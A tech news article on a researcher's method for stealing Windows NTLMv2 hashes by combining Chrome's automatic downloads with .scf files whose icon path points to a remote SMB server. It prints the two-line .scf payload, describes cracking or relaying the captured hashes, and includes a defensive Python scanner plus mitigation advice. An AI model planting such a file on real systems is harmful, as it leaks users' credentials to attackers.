
Researcher Shows How To Hack Windows Login Details Using Google Chrome And SCF Files


By combining a flaw in the way the SMB networking protocol works with the behaviour of Windows .scf files, a security researcher has come up with a new Windows credential-theft method. Just by opening the folder that contains a specially crafted .scf file, a user ends up sending their Windows credentials to a remote server via Chrome and SMB. Users are advised to disable the automatic download feature in the Google Chrome web browser. The researcher also expects Google to address this issue soon.
SMB, or Server Message Block, is a network file sharing protocol implemented in Microsoft Windows. Using SMB, an application can access files on a remote server as well as resources such as printers and mailslots. Attacks on Windows via SMB file sharing are an already known issue, but they are limited to local area networks. In a new development, a security researcher has shown how to carry out such an attack through Google Chrome.
This attack works by exploiting Chrome's behaviour of automatically downloading files it deems safe. Chrome saves such files to a preset location without asking the user. Suppose a malicious file is downloaded to the system. Normally, the user would still need to interact with the file for it to do anything malicious. What if there are files that don't need any interaction at all?

.SCF file + SMB Protocol + Google Chrome

One such file type is the Windows Explorer Shell Command File (.scf). It supports a few Windows Explorer commands, such as showing the desktop or opening a Windows Explorer window. When a .scf file stored on disk is displayed in a Windows Explorer window, Explorer retrieves the icon file it references.
Serbian security researcher Bosko Stankovic of DefenseCode combined these two concepts, the SMB protocol and the .scf file, to devise a new type of attack.
A .scf file can be used to trick Windows into authenticating to a remote SMB server. This is what the contents of the file look like:
    [Shell]
    IconFile=\\170.170.170.170\icon
Once a user has downloaded the file, it is triggered as soon as the download folder is opened to view it. Note that one doesn't need to click or open the file; Windows File Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server, which is set up by the attacker. The server captures the user's username and NTLMv2 password hash, which can be cracked offline. The server can also be configured to relay the connection to an external service that accepts such credentials.
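As an added defender-side example (not code from the article or from DefenseCode), the following Python parses the [Shell] section of a .scf file and flags an IconFile that points at a remote host via a UNC path, which is exactly the condition that makes Explorer open an SMB session when the folder is rendered. The handling of the optional ",index" icon suffix and the download-folder scan helper are assumptions about the format beyond what the article shows.

```python
import re
from pathlib import Path
from typing import Optional

# A UNC path such as \\170.170.170.170\icon or \\host\share\file.ico.
# The trailing backslash is optional so a bare \\host is still caught.
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")


def parse_scf(text: str) -> dict:
    """Parse the INI-like SCF format into {section: {key: value}}, case-folded."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text: str) -> Optional[str]:
    """Return the host Explorer would contact for this SCF's icon, or None.

    A UNC IconFile (\\\\host\\...) triggers an outbound SMB authentication when
    the folder is displayed; a local path (C:\\..., explorer.exe,3) does not.
    """
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    icon = icon.split(",")[0].strip().strip('"')  # drop the ",<index>" suffix (assumed format)
    m = UNC_RE.match(icon)
    return m.group(1) if m else None


def scan_downloads(folder: Path) -> list:
    """List (filename, host) for .scf files in a folder that reference a remote icon."""
    hits = []
    for path in folder.glob("*.scf"):
        host = remote_icon_host(path.read_text(errors="ignore"))
        if host:
            hits.append((path.name, host))
    return hits


if __name__ == "__main__":
    import sys
    for name, host in scan_downloads(Path(sys.argv[1] if len(sys.argv) > 1 else ".")):
        print(f"{name}: icon would be fetched over SMB from {host}")
```

Running it against the Downloads folder reports any .scf file that would cause an SMB authentication to an outside host without being opened, which is the signal a blue team would want before Explorer ever renders the folder.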

Defeating Windows login credential theft

The security researcher advises users to disable automatic downloads in Google Chrome. To do so, open Chrome's Settings, click Show Advanced Settings, and check "Ask where to save each file before downloading".
This change will force Google Chrome to ask for your permission before downloading a file. The researcher also hopes that Google will soon address this flaw.
Did you find this article on Windows hacking using Google Chrome, .SCF file, and SMB protocol useful? Don’t forget to share your views.
